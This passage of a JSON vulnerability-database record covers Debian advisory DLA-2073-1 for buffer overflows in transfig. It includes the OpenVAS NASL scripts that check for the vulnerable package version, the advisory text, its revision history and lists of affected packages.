the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892073\");\n script_version(\"2020-01-22T04:00:12+0000\");\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-22 04:00:12 +0000 (Wed, 22 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-22 04:00:12 +0000 (Wed, 22 Jan 2020)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 2073-1] transfig security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2073-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'transfig'\n package(s) announced via the DSA-2073-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several issues have been found in transfig, a XFig figure files converter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line()\nallows an attacker to write prior to the beginning of the\nbuffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow\nfunction in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an\nincorrect sscanf.\");\n\n script_tag(name:\"affected\", value:\"'transfig' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"transfig\", ver:\"1:3.2.5.e-4+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "naslFamily": "Debian Local Security Checks"}, "differentElements": ["modified", "sourceData", "title"], "edition": 1, "lastseen": "2020-01-22T14:34:24"}], "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2019-19555", "RH:CVE-2018-16140", "RH:CVE-2019-14275"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-16140", "UB:CVE-2019-19555", "UB:CVE-2019-14275"]}, {"type": "cve", "idList": ["CVE-2018-16140", "CVE-2019-14275", "CVE-2019-19555"]}, {"type": "nessus", "idList": ["OPENSUSE-2021-1143.NASL", "SUSE_SU-2021-14823-1.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-2454-1.NASL", "OPENSUSE-2019-1455.NASL", "UBUNTU_USN-3760-1.NASL", "OPENSUSE-2021-2454.NASL", "OPENSUSE-2020-1702.NASL", "OPENSUSE-2020-1843.NASL", "SUSE_SU-2021-3124-1.NASL", "SUSE_SU-2020-1806-1.NASL", "OPENSUSE-2021-1318.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2018-16140/"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"]}, {"type": "ubuntu", "idList": ["USN-3760-1"]}], "modified": "2020-01-29T18:43:39", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-01-29T18:43:39", "rev": 2}}, "objectVersion": "1.5", "pluginID": "1361412562310892073", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892073\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-22 04:00:12 +0000 (Wed, 22 Jan 2020)\");\n script_name(\"Debian LTS: Security Advisory for transfig (DLA-2073-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2073-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'transfig'\n package(s) announced via the DLA-2073-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several issues have been found in transfig, a XFig figure files converter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line()\nallows an attacker to write prior to the beginning of the\nbuffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow\nfunction in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an\nincorrect sscanf.\");\n\n script_tag(name:\"affected\", value:\"'transfig' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"transfig\", ver:\"1:3.2.5.e-4+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "naslFamily": "Debian Local Security Checks", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "debian": [{"id": "DEBIAN:DLA-2073-1:017FC", "hash": "6c1b17ab0a21a6a00337dbbce79047d3", "type": "debian", "bulletinFamily": "unix", "title": "[SECURITY] [DLA 2073-1] transfig security update", "description": "Package : transfig\nVersion : 1:3.2.5.e-4+deb8u2\nCVE ID : CVE-2018-16140 CVE-2019-14275 CVE-2019-19555\n\n\nSeveral issues have been found in transfig, a XFig figure files converter.\n\nCVE-2018-16140\n\n Buffer underwrite vulnerability in get_line()\n allows an attacker to write prior to the beginning of the\n buffer via a crafted .fig file.\n\nCVE-2019-14275\n\n Stack-based buffer overflow in the calc_arrow\n function in bound.c.\n\nCVE-2019-19555\n\n Stack-based buffer overflow because of an\n incorrect sscanf.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "published": "2020-01-21T21:42:12", "modified": "2020-01-21T21:42:12", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html", "reporter": "Debian", "references": [], "cvelist": ["CVE-2018-16140", "CVE-2019-14275", "CVE-2019-19555"], "immutableFields": [], "lastseen": "2021-10-22T11:33:07", "history": [{"bulletin": {"id": "DEBIAN:DLA-2073-1:017FC", "hash": "b0dd7412c3eef55bca95de2fcf4ff8e84b72a2b34404abeaa970edf3fcf6de97", "type": "debian", "bulletinFamily": "unix", "title": "[SECURITY] [DLA 2073-1] transfig security update", "description": "Package : transfig\nVersion : 1:3.2.5.e-4+deb8u2\nCVE ID : CVE-2018-16140 CVE-2019-14275 CVE-2019-19555\n\n\nSeveral issues have been found in transfig, a XFig figure files converter.\n\nCVE-2018-16140\n\n Buffer underwrite vulnerability in get_line()\n allows an attacker to write prior to the beginning of the\n buffer via a crafted .fig file.\n\nCVE-2019-14275\n\n Stack-based buffer overflow in the calc_arrow\n function in bound.c.\n\nCVE-2019-19555\n\n Stack-based buffer overflow because of an\n incorrect sscanf.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "published": "2020-01-21T21:43:04", "modified": "2020-01-21T21:43:04", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://lists.debian.org/debian-lts-announce/2020/debian-lts-announce-202001/msg00018.html", "reporter": "Debian", "references": [], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "immutableFields": [], "lastseen": "2020-01-22T02:31:07", "history": [], "viewCount": 45, "enchantments": {"dependencies": {"modified": "2020-01-22T02:31:07", "references": [{"idList": ["USN-3760-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"], "type": "openvas"}, {"idList": ["OPENSUSE-SU-2019:1455-1"], "type": "suse"}, {"idList": ["UBUNTU_USN-3760-1.NASL", "OPENSUSE-2019-1455.NASL"], "type": "nessus"}, {"idList": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "type": "cve"}]}, "score": {"modified": "2020-01-22T02:31:07", "value": 7.4, "vector": "NONE"}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "Debian", "OSVersion": "8", "arch": "all", "operator": "lt", "packageFilename": "transig_1:3.2.5.e-4+deb8u2_all.deb", "packageName": "transig", "packageVersion": "1:3.2.5.e-4+deb8u2"}]}, "lastseen": "2020-01-22T02:31:07", "differentElements": ["affectedPackage", "cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "DEBIAN:DLA-2073-1:017FC", "hash": "a19f8f1fbcd028e65c788f93db848502", "type": "debian", "bulletinFamily": "unix", "title": "[SECURITY] [DLA 2073-1] transfig security update", "description": "Package : transfig\nVersion : 1:3.2.5.e-4+deb8u2\nCVE ID : CVE-2018-16140 CVE-2019-14275 CVE-2019-19555\n\n\nSeveral issues have been found in transfig, a XFig figure files converter.\n\nCVE-2018-16140\n\n Buffer underwrite vulnerability in get_line()\n allows an attacker to write prior to the beginning of the\n buffer via a crafted .fig file.\n\nCVE-2019-14275\n\n Stack-based buffer overflow in the calc_arrow\n function in bound.c.\n\nCVE-2019-19555\n\n Stack-based buffer overflow because of an\n incorrect sscanf.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "published": "2020-01-21T21:43:04", "modified": "2020-01-21T21:43:04", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://lists.debian.org/debian-lts-announce/2020/debian-lts-announce-202001/msg00018.html", "reporter": "Debian", "references": [], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "immutableFields": [], "lastseen": "2020-01-23T02:47:19", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2019-19555", "RH:CVE-2018-16140", "RH:CVE-2019-14275"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-16140", "UB:CVE-2019-19555", "UB:CVE-2019-14275"]}, {"type": "cve", "idList": ["CVE-2018-16140", "CVE-2019-14275", "CVE-2019-19555"]}, {"type": "nessus", "idList": ["OPENSUSE-2021-1143.NASL", "SUSE_SU-2021-14823-1.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-2454-1.NASL", "OPENSUSE-2019-1455.NASL", "UBUNTU_USN-3760-1.NASL", "OPENSUSE-2021-2454.NASL", "OPENSUSE-2020-1702.NASL", "OPENSUSE-2020-1843.NASL", "SUSE_SU-2021-3124-1.NASL", "SUSE_SU-2020-1806-1.NASL", "OPENSUSE-2021-1318.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2018-16140/"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "ubuntu", "idList": ["USN-3760-1"]}], "modified": "2020-01-23T02:47:19", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2020-01-23T02:47:19", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "Debian", "OSVersion": "8", "arch": "all", "operator": "lt", "packageFilename": "transfig_1:3.2.5.e-4+deb8u2_all.deb", "packageName": "transfig", "packageVersion": "1:3.2.5.e-4+deb8u2"}]}, "lastseen": "2020-01-23T02:47:19", "differentElements": ["affectedPackage", "cvss2", "cvss3"], "edition": 2}, {"bulletin": {"id": "DEBIAN:DLA-2073-1:017FC", "hash": "bd761a04f9bed06beef933e40276b80fbf921034e1d97bce9d67c38983d2d7f1", "type": "debian", "bulletinFamily": "unix", "title": "[SECURITY] [DLA 2073-1] transfig security update", "description": "Package : transfig\nVersion : 1:3.2.5.e-4+deb8u2\nCVE ID : CVE-2018-16140 CVE-2019-14275 CVE-2019-19555\n\n\nSeveral issues have been found in transfig, a XFig figure files converter.\n\nCVE-2018-16140\n\n Buffer underwrite vulnerability in get_line()\n allows an attacker to write prior to the beginning of the\n buffer via a crafted .fig file.\n\nCVE-2019-14275\n\n Stack-based buffer overflow in the calc_arrow\n function in bound.c.\n\nCVE-2019-19555\n\n Stack-based buffer overflow because of an\n incorrect sscanf.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "published": "2020-01-21T21:43:04", "modified": "2020-01-21T21:43:04", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://lists.debian.org/debian-lts-announce/2020/debian-lts-announce-202001/msg00018.html", "reporter": "Debian", "references": [], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "immutableFields": [], "lastseen": "2020-01-23T02:47:19", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"modified": "2020-01-23T02:47:19", "references": [{"idList": ["USN-3760-1"], "type": "ubuntu"}, {"idList": ["UB:CVE-2019-19555", "UB:CVE-2019-14275", "UB:CVE-2018-16140"], "type": "ubuntucve"}, {"idList": ["MSF:ILITIES/SUSE-CVE-2018-16140/"], "type": "metasploit"}, {"idList": ["OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:2454-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"], "type": "openvas"}, {"idList": ["UBUNTU_USN-3760-1.NASL", "OPENSUSE-2021-2454.NASL", "SUSE_SU-2021-2454-1.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2020-1702.NASL", "DEBIAN_DLA-2073.NASL", "OPENSUSE-2019-1455.NASL", "SUSE_SU-2020-1806-1.NASL"], "type": "nessus"}, {"idList": ["RH:CVE-2018-16140", "RH:CVE-2019-19555", "RH:CVE-2019-14275"], "type": "redhatcve"}, {"idList": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-01-23T02:47:19", "rev": 2, "value": 7.1, "vector": "NONE"}}, "objectVersion": "1.6", "affectedPackage": []}, "lastseen": "2020-01-23T02:47:19", "differentElements": ["affectedPackage", "cvss2", "cvss3", "description", "href", "modified", "published"], "edition": 3}], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-14275", "CVE-2018-16140", "CVE-2019-19555"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-19555", "UB:CVE-2018-16140", "UB:CVE-2019-14275"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-19555", "RH:CVE-2019-14275", "RH:CVE-2018-16140"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"]}, {"type": "nessus", "idList": ["OPENSUSE-2020-1843.NASL", "DEBIAN_DLA-2073.NASL", "OPENSUSE-2019-1455.NASL", "SUSE_SU-2020-1806-1.NASL", "OPENSUSE-2021-2454.NASL", "SUSE_SU-2021-2454-1.NASL", "UBUNTU_USN-3760-1.NASL", "SUSE_SU-2021-14823-1.NASL", "OPENSUSE-2020-1702.NASL", "SUSE_SU-2021-3124-1.NASL", "OPENSUSE-2021-1318.NASL", "OPENSUSE-2021-1143.NASL"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2018-16140/"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "ubuntu", "idList": ["USN-3760-1"]}], "modified": "2021-10-22T11:33:07", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-10-22T11:33:07", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "arch": "armhf", "OSVersion": "10", "packageFilename": "fig2dev_3.2.7a-5+deb10u2_armhf.deb", "operator": "lt", "packageName": "fig2dev"}, {"packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u1_arm64.deb", "OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "arch": "arm64", "OSVersion": "10", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "OS": "Debian", "packageFilename": "fig2dev_3.2.6a-2+deb9u3_armhf.deb", "packageVersion": "3.2.6a-2+deb9u3", "arch": "armhf", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u2_arm64.deb", "OS": "Debian", "arch": "arm64", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev-dbgsym"}, {"packageVersion": "3.2.7a-5+deb10u2", "arch": "armel", "packageFilename": "fig2dev_3.2.7a-5+deb10u2_armel.deb", "OS": "Debian", "OSVersion": "10", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "arch": "armel", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "packageFilename": "fig2dev_3.2.6a-2+deb9u3_armel.deb", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "OS": "Debian", "packageFilename": "fig2dev_3.2.6a-2+deb9u2_arm64.deb", "arch": "arm64", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev"}, {"OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "arch": "mips64el", "operator": "lt", "packageFilename": "fig2dev_3.2.7a-5+deb10u1_mips64el.deb", "packageName": "fig2dev"}, {"OSVersion": "9", "packageFilename": "fig2dev_3.2.6a-2+deb9u3_amd64.deb", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "operator": "lt", "arch": "amd64", "packageName": "fig2dev"}, {"OSVersion": "9", "arch": "armel", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "operator": "lt", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u3_armel.deb", "packageName": "fig2dev-dbgsym"}, {"packageVersion": "3.2.7a-5+deb10u2", "packageFilename": "fig2dev_3.2.7a-5+deb10u2_s390x.deb", "OS": "Debian", "OSVersion": "10", "arch": "s390x", "operator": "lt", "packageName": "fig2dev"}, {"packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u2_mips.deb", "packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "OSVersion": "10", "operator": "lt", "arch": "mips", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "packageFilename": "fig2dev_3.2.6a-2+deb9u3_ppc64el.deb", "arch": "ppc64el", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "packageFilename": "fig2dev_3.2.6a-2+deb9u2_amd64.deb", "OS": "Debian", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "arch": "amd64", "packageName": "fig2dev"}, {"OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u1_amd64.deb", "OSVersion": "10", "operator": "lt", "arch": "amd64", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "packageFilename": "fig2dev_3.2.6a-2+deb9u2_mipsel.deb", "OS": "Debian", "arch": "mipsel", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev"}, {"OSVersion": "9", "operator": "lt", "OS": "Debian", "arch": "mips64el", "packageFilename": "fig2dev_3.2.6a-2+deb9u2_mips64el.deb", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev"}, {"OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "arch": "armhf", "operator": "lt", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u1_armhf.deb", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "packageFilename": "fig2dev_3.2.6a-2+deb9u2_armhf.deb", "OS": "Debian", "arch": "armhf", "operator": "lt", "packageVersion": "3.2.6a-2+deb9u2", "packageName": "fig2dev"}, {"OSVersion": "9", "arch": "all", "OS": "Debian", "packageFilename": "fig2dev_1:3.2.6a-2+deb9u3_all.deb", "packageVersion": "1:3.2.6a-2+deb9u3", "operator": "lt", "packageName": "fig2dev"}, {"OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "arch": "ppc64el", "operator": "lt", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u1_ppc64el.deb", "packageName": "fig2dev-dbgsym"}, {"packageFilename": "fig2dev_3.2.7a-5+deb10u2_i386.deb", "packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "OSVersion": "10", "arch": "i386", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u3_mipsel.deb", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "arch": "mipsel", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "packageVersion": "3.2.6a-2+deb9u2", "OS": "Debian", "arch": "ppc64el", "operator": "lt", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u2_ppc64el.deb", "packageName": "fig2dev-dbgsym"}, {"OSVersion": "9", "packageFilename": "fig2dev_3.2.6a-2+deb9u3_mips64el.deb", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "arch": "mips64el", "operator": "lt", "packageName": "fig2dev"}, {"packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "arch": "arm64", "OSVersion": "10", "packageFilename": "fig2dev_3.2.7a-5+deb10u2_arm64.deb", "operator": "lt", "packageName": "fig2dev"}, {"OSVersion": "9", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u3_armhf.deb", "arch": "armhf", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.2.5.e-4+deb8u2", "operator": "lt", "packageFilename": "transfig_3.2.5.e-4+deb8u2_amd64.deb", "arch": "amd64", "packageName": "transfig"}, {"OSVersion": "9", "operator": "lt", "OS": "Debian", "packageVersion": "3.2.6a-2+deb9u3", "packageFilename": "fig2dev-dbgsym_3.2.6a-2+deb9u3_mips.deb", "arch": "mips", "packageName": "fig2dev-dbgsym"}, {"packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "OSVersion": "10", "arch": "mipsel", "operator": "lt", "packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u2_mipsel.deb", "packageName": "fig2dev-dbgsym"}, {"OS": "Debian", "OSVersion": "8", "arch": "armhf", "packageFilename": "transfig_3.2.5.e-4+deb8u2_armhf.deb", "operator": "lt", "packageVersion": "3.2.5.e-4+deb8u2", "packageName": "transfig"}, {"packageFilename": "fig2dev-dbgsym_3.2.7a-5+deb10u1_s390x.deb", "OS": "Debian", "packageVersion": "3.2.7a-5+deb10u1", "OSVersion": "10", "arch": "s390x", "operator": "lt", "packageName": "fig2dev-dbgsym"}, {"packageVersion": "3.2.7a-5+deb10u2", "OS": "Debian", "arch": 